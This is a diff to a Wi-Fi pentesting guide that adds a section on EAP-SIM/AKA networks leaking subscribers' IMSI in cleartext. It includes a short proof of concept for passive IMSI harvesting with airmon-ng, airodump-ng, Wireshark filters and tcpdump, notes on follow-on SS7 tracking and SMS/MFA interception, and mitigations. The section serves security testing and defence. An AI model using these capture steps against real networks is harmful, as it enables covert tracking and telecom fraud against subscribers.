diff --git a/src/generic-methodologies-and-resources/pentesting-wifi/README.md b/src/generic-methodologies-and-resources/pentesting-wifi/README.md
index aeac6c3b6ca..3320e44ede3 100644
--- a/src/generic-methodologies-and-resources/pentesting-wifi/README.md
+++ b/src/generic-methodologies-and-resources/pentesting-wifi/README.md
@@ -452,6 +452,62 @@ Regardless of the protocol chosen, the PEAP/TTLS server obtains knowledge of the
For more info check [https://www.interlinknetworks.com/app_notes/eap-peap.htm](https://www.interlinknetworks.com/app_notes/eap-peap.htm)
+### SIM-based EAP (EAP-SIM/EAP-AKA) identity leakage (IMSI exposure)
+
+SIM-based Wi‑Fi authentication using EAP‑SIM/EAP‑AKA over 802.1X can leak the permanent subscriber identifier (IMSI) in cleartext during the unauthenticated identity phase if the deployment doesn’t implement pseudonyms/protected identities or a TLS tunnel around the inner EAP.
+
+Where the leak happens (high level):
+- 802.11 association completes to the SSID (often carrier offload SSIDs like FreeWifi_secure, eduroam-like operator realms, etc.).
+- Authenticator sends EAP-Request/Identity.
+- Vulnerable clients answer EAP-Response/Identity with their permanent identity = IMSI encoded as a 3GPP NAI, prior to any protection.
+ - Example NAI: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
+- Anyone passively listening to RF can read that frame. No 4-way handshake or TLS keying is needed.
+
+Quick PoC: passive IMSI harvesting on EAP‑SIM/AKA networks lacking identity privacy
+
+Click to expand
+
+```bash
+# 1) Enable monitor mode
+airmon-ng start wlan0
+
+# 2) Optional: lock channel to the target BSS
+airodump-ng wlan0mon --essid
+
+# 3) Capture 802.1X/EAP frames
+# Wireshark display filters:
+# eap || eapol
+# (identity specifically): eap.code == 2 && eap.type == 1
+# Kismet: add source wlan0mon; enable 802.1X/EAP views
+# tcpdump (pcap capture):
+# tcpdump -i wlan0mon -s 0 -w eapsim_identity.pcap
+
+# 4) Wait for a device to auto-connect to the SSID
+# 5) Inspect the first EAP-Response/Identity frame
+# Expected: ASCII NAI containing IMSI, e.g.
+# 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
+```
+
+
+
+Notes:
+- Works before any TLS tunnel if the deployment uses bare EAP‑SIM/AKA without protected identity/pseudonyms.
+- The exposed value is a permanent identifier tied to the subscriber’s SIM; harvesting enables long‑term tracking and downstream telecom abuses.
+
+Impact
+- Privacy: persistent user/device tracking from passive Wi‑Fi captures in public places.
+- Telecom abuse bootstrap: with the IMSI, an attacker with SS7/Diameter access can query location or attempt call/SMS interception and MFA theft.
+
+Mitigations / what to look for
+- Verify that clients use anonymous outer identities (pseudonyms) for EAP‑SIM/AKA as per 3GPP guidance (e.g., 3GPP TS 33.402).
+- Prefer tunneling the identity phase (e.g., EAP‑TTLS/PEAP carrying inner EAP‑SIM/AKA) so the IMSI is never sent in clear.
+- Packet captures of association/auth should never reveal a raw IMSI in EAP-Response/Identity.
+
+Related: Telecom signalling exploitation with captured mobile identifiers
+{{#ref}}
+../pentesting-network/telecom-network-exploitation.md
+{{#endref}}
+
### EAP-Bruteforce (password spray)
If the client is expected to use a **username and password** (notice that **EAP-TLS won't be valid** in this case), then you could try to get a **list** a **usernames** (see next part) and **passwords** and try to **bruteforce** the access using [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**.**
@@ -792,6 +848,10 @@ These methods, particularly PIN entry, are susceptible to the same vulnerabiliti
- [https://medium.com/hacking-info-sec/ataque-clientless-a-wpa-wpa2-usando-pmkid-1147d72f464d](https://medium.com/hacking-info-sec/ataque-clientless-a-wpa-wpa2-usando-pmkid-1147d72f464d)
- [https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)]()
- [https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/](https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/)
+- [The vulnerability that killed FreeWifi_Secure](https://7h30th3r0n3.fr/the-vulnerability-that-killed-freewifi_secure/)
+- [RFC 4186 – EAP-SIM Authentication](https://datatracker.ietf.org/doc/html/rfc4186)
+- [3GPP TS 33.402 – 3GPP system architecture evolution (SAE); Security aspects of non-3GPP accesses](https://www.3gpp.org/ftp/Specs/archive/33_series/33.402/)
+
TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals)